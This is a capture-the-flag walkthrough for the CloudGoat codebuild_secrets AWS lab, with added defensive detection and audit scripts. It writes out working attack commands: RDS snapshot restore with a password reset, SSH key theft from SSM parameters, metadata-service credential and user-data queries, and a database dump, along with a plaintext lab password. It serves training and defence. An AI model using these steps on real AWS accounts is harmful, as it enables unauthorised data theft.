CloudGoat AWS CTF solution - Scenario 9 (codebuild_secrets)

Scenario 9 - codebuild_secrets

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create codebuild_secrets

Scenario Resources

  • RDS x 1
  • EC2 x 1

Scenario Start(s)

Scenario Goal(s)

Summary

Exploitation Route(s)

Walkthrough — Calrissian via RDS Snapshot

  1. As the IAM user Solo, the attacker explores the AWS environment, enumerates its permissions, and discovers they are able to list CodeBuild projects.
aws codebuild list-projects --profile solo
aws codebuild batch-get-projects --names cg-codebuild-codebuild_secrets_cgidnmff3ngu3y --profile solo
aws rds create-db-snapshot --db-instance-identifier cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y --db-snapshot-identifier cloudgoat --profile calrissian
aws rds describe-db-subnet-groups --profile calrissian
aws ec2 describe-security-groups --profile calrissian
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier copy-of-old --db-snapshot-identifier cloudgoat --db-subnet-group-name cloud-goat-rds-testing-subnet-group-codebuild_secrets_cgidnmff3ngu3y --publicly-accessible --vpc-security-group-ids sg-03bb0912657c162f0 --profile calrissian
aws rds describe-db-instances --profile calrissian
aws rds modify-db-instance --db-instance-identifier copy-of-old --master-user-password cloudgoat --profile calrissian
nmap -Pn --disable-arp-ping -n -vv -sS -p5432 copy-of-old.czksqkjfewb6.us-east-1.rds.amazonaws.com
psql -h copy-of-old.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d postgres
#list available databases
\l
#change to database
\c securedb
#list tables
\dt
select * from sensitive_information;
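The Calrissian route above leaves a distinctive trail in CloudTrail: a CreateDBSnapshot, a RestoreDBInstanceFromDBSnapshot with publiclyAccessible set, and a ModifyDBInstance that resets the master password on the restored copy, all from one principal. The detector below, which is an added example and not part of the original write-up or CloudGoat itself, runs over constructed CloudTrail records shaped like real rds.amazonaws.com events (in real logs the masterUserPassword value is redacted to "****", so the check keys on the field being present, not on its value). The account id and the dba principal are placeholders.

```python
"""Flag the snapshot -> public restore -> password reset chain in CloudTrail events."""
import json
from collections import defaultdict

# Constructed CloudTrail records (not captured from the lab). Account id is a placeholder.
SAMPLE_EVENTS = [
    {"eventTime": "2023-01-01T10:00:00Z", "eventSource": "rds.amazonaws.com",
     "eventName": "CreateDBSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y",
                           "dBSnapshotIdentifier": "cloudgoat"}},
    {"eventTime": "2023-01-01T10:05:00Z", "eventSource": "rds.amazonaws.com",
     "eventName": "RestoreDBInstanceFromDBSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "copy-of-old",
                           "dBSnapshotIdentifier": "cloudgoat",
                           "publiclyAccessible": True}},
    {"eventTime": "2023-01-01T10:20:00Z", "eventSource": "rds.amazonaws.com",
     "eventName": "ModifyDBInstance",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/calrissian"},
     "requestParameters": {"dBInstanceIdentifier": "copy-of-old",
                           "masterUserPassword": "****"}},
    # Benign control: a DBA rotating the password on the original instance directly.
    {"eventTime": "2023-01-01T11:00:00Z", "eventSource": "rds.amazonaws.com",
     "eventName": "ModifyDBInstance",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dba"},
     "requestParameters": {"dBInstanceIdentifier": "cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y",
                           "masterUserPassword": "****"}},
]


def detect_snapshot_restore_abuse(events):
    """Return findings, in time order, for the restore-and-reset pattern.

    MEDIUM: a snapshot restored as a publicly accessible instance.
    HIGH:   master password reset on an instance the same principal restored from a snapshot.
    """
    findings = []
    snapshots = defaultdict(dict)  # principal -> {snapshot id: source instance}
    restored = defaultdict(dict)   # principal -> {restored instance: snapshot id}
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("eventSource") != "rds.amazonaws.com":
            continue
        who = ev["userIdentity"]["arn"]
        name = ev["eventName"]
        p = ev.get("requestParameters") or {}
        if name == "CreateDBSnapshot":
            snapshots[who][p["dBSnapshotIdentifier"]] = p["dBInstanceIdentifier"]
        elif name == "RestoreDBInstanceFromDBSnapshot":
            restored[who][p["dBInstanceIdentifier"]] = p["dBSnapshotIdentifier"]
            if p.get("publiclyAccessible"):
                findings.append({"severity": "MEDIUM", "principal": who, "time": ev["eventTime"],
                                 "instance": p["dBInstanceIdentifier"],
                                 "reason": "snapshot restored as a publicly accessible instance"})
        elif name == "ModifyDBInstance" and "masterUserPassword" in p:
            inst = p["dBInstanceIdentifier"]
            snap = restored[who].get(inst)
            if snap is not None:
                source = snapshots[who].get(snap, "<snapshot not created by this principal>")
                findings.append({"severity": "HIGH", "principal": who, "time": ev["eventTime"],
                                 "instance": inst,
                                 "reason": f"master password reset on copy of {source} "
                                           f"restored from snapshot {snap}"})
    return findings


if __name__ == "__main__":
    for f in detect_snapshot_restore_abuse(SAMPLE_EVENTS):
        print(json.dumps(f))
```

The benign DBA rotation is deliberately not flagged: the password reset only scores HIGH when the target instance was itself restored from a snapshot by the same principal, which is the step that turns a read-only snapshot into a database the caller can log in to. Scoping rds:RestoreDBInstanceFromDBSnapshot and rds:ModifyDBInstance away from users who only need snapshot creation removes the chain entirely.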

Walkthrough — Solo via EC2 Metadata service

  1. As the Solo user, the IAM enumeration tool was unable to determine SSM permissions, but on manually checking Solo's permissions we can see we have ssm:DescribeParameters and ssm:GetParameter.
aws ssm describe-parameters --profile solo
  2. In the account's SSM parameters, we found a pair of SSH keys stored without any encryption.
aws ssm get-parameter --name cg-ec2-private-key-codebuild_secrets_cgidnmff3ngu3y --profile solo
echo -e <ssh_key_without_newlines> > ssh_key_private.out
chmod 400 ssh_key_private.out
aws ec2 describe-instances --profile solo
ssh -i ssh_key_private.out ubuntu@52.71.210.122
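"Stored without any encryption" here means the parameter was created with Type String rather than SecureString, which is what Parameter Store encrypts with KMS. The audit below is an added example (not from the original write-up or CloudGoat) that runs over a constructed `aws ssm describe-parameters` response and flags secret-looking names held as plain String, plus SecureString parameters that rely on the AWS-managed key alias/aws/ssm. The name pattern and the sample entries other than the private-key parameter are my own assumptions.

```python
"""Audit `aws ssm describe-parameters` output for secrets stored without KMS encryption."""
import json
import re

# Names that should never be stored as a plain String (assumed pattern, tune to your naming).
SECRET_NAME = re.compile(r"(private[-_]?key|secret|passw(or)?d|token|api[-_]?key|credential)", re.I)

# Constructed describe-parameters response shaped like the real API; only the
# private-key name comes from the lab, the rest are made up for the example.
SAMPLE_DESCRIBE_PARAMETERS = {"Parameters": [
    {"Name": "cg-ec2-private-key-codebuild_secrets_cgidnmff3ngu3y", "Type": "String",
     "Version": 1, "Tier": "Standard", "DataType": "text"},
    {"Name": "/prod/db/password", "Type": "SecureString", "KeyId": "alias/aws/ssm",
     "Version": 3, "Tier": "Standard", "DataType": "text"},
    {"Name": "/prod/app/log-level", "Type": "String",
     "Version": 1, "Tier": "Standard", "DataType": "text"},
]}


def audit_parameters(describe_output):
    """Return findings for parameters whose storage does not match their sensitivity."""
    findings = []
    for p in describe_output.get("Parameters", []):
        name, ptype = p["Name"], p.get("Type")
        if ptype != "SecureString" and SECRET_NAME.search(name):
            findings.append({
                "severity": "HIGH", "name": name,
                "reason": f"secret-looking name stored as {ptype} (readable by any ssm:GetParameter)",
                # Real CLI flags; --overwrite keeps the name and bumps the version.
                "remediation": f"aws ssm put-parameter --name '{name}' --type SecureString "
                               f"--overwrite --value <re-issued secret>",
            })
        elif ptype == "SecureString" and p.get("KeyId", "alias/aws/ssm") == "alias/aws/ssm":
            findings.append({
                "severity": "LOW", "name": name,
                "reason": "SecureString under the AWS-managed key; a customer-managed KMS key "
                          "lets kms:Decrypt be granted separately from ssm:GetParameter",
                "remediation": f"aws ssm put-parameter --name '{name}' --type SecureString "
                               f"--key-id <customer managed key id> --overwrite --value <secret>",
            })
    return findings


if __name__ == "__main__":
    print(json.dumps(audit_parameters(SAMPLE_DESCRIBE_PARAMETERS), indent=2))
```

Re-encrypting a parameter in place is not enough once it has been readable in plain text; the SSH key should be re-issued and the old one removed from the instance's authorized_keys, which is why the remediation string says "re-issued secret" rather than copying the current value across.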

Branch A

  1. Now working with shell access, we can query the EC2 metadata service, retrieve the instance profile's temporary IAM credentials, and continue as the EC2 role.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-codebuild_secrets_cgidnmff3ngu3y
aws lambda list-functions --profile ec2_role
aws rds describe-db-instances --profile ec2_role
psql -h cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d securedb

Branch B

  1. Now working with shell access, we query the EC2 metadata service and discover that the database address is stored in the user data, along with admin credentials:
curl http://169.254.169.254/latest/user-data
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com:5432/securedb
psql -h cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d securedb
#listing tables
\dt
select * from sensitive_information;
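Both branches depend on two instance settings a defender can audit: IMDSv1 being allowed (the bare curl to 169.254.169.254 works without a session token) and user data carrying a live connection string. The script below is an added example, not code from the original write-up or CloudGoat, that checks constructed `aws ec2 describe-instances` and `aws ec2 describe-instance-attribute --attribute userData` responses; instance ids, the user-data script and its password are placeholders I made up, while the RDS hostname is the one from the walkthrough.

```python
"""Audit EC2 instances for IMDSv1 exposure and for secrets embedded in user data."""
import base64
import json
import re

# Credential patterns (assumed, extend as needed): scheme://user:password@host and KEY=value.
URL_CREDS = re.compile(r"([a-z][a-z0-9+.\-]*://[^:/\s@]+:)([^@\s]+)(@)", re.I)
ASSIGN_CREDS = re.compile(r"((?:PASSWORD|PASSWD|SECRET|TOKEN)\s*=\s*['\"]?)([^'\"\s]+)", re.I)

# Constructed describe-instances output; real responses carry many more fields.
SAMPLE_DESCRIBE_INSTANCES = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0123456789abcdef0",
     "MetadataOptions": {"State": "applied", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0fedcba9876543210",
     "MetadataOptions": {"State": "applied", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
]}]}

# Constructed user-data script with a placeholder password, base64-encoded as the API returns it.
SAMPLE_USER_DATA_SCRIPT = """#!/bin/bash
apt-get install -y postgresql-client
psql postgresql://cgadmin:pw-placeholder@cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com:5432/securedb -c 'select 1'
"""
SAMPLE_USER_DATA_ATTR = {
    "InstanceId": "i-0123456789abcdef0",
    "UserData": {"Value": base64.b64encode(SAMPLE_USER_DATA_SCRIPT.encode()).decode()},
}


def imdsv1_instances(describe_instances):
    """Instance ids whose metadata endpoint is on but does not require IMDSv2 tokens."""
    exposed = []
    for reservation in describe_instances.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            mo = inst.get("MetadataOptions", {})
            if mo.get("HttpEndpoint", "enabled") == "enabled" and mo.get("HttpTokens") != "required":
                exposed.append(inst["InstanceId"])
    return exposed


def scan_user_data(attr):
    """Findings for credential-like content in a userData attribute, with secrets redacted."""
    raw = attr.get("UserData", {}).get("Value")
    if not raw:
        return []
    text = base64.b64decode(raw).decode("utf-8", errors="replace")
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        redacted = URL_CREDS.sub(r"\1<redacted>\3", line)
        redacted = ASSIGN_CREDS.sub(r"\1<redacted>", redacted)
        if redacted != line:  # something matched, so a secret was present
            findings.append({"instance": attr["InstanceId"], "line": lineno,
                             "snippet": redacted.strip()})
    return findings


if __name__ == "__main__":
    print(json.dumps({"imdsv1": imdsv1_instances(SAMPLE_DESCRIBE_INSTANCES),
                      "user_data": scan_user_data(SAMPLE_USER_DATA_ATTR)}, indent=2))
```

For an exposed instance the fix is `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`, which makes the plain GET in Branch A fail until the caller first obtains a token with a PUT. Requiring IMDSv2 does not help with Branch B, since user data is also readable through ec2:DescribeInstanceAttribute; the credentials there should move to Secrets Manager or a SecureString parameter that the instance role fetches at boot, and the password in the database should be rotated because user data is retained for the life of the instance.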
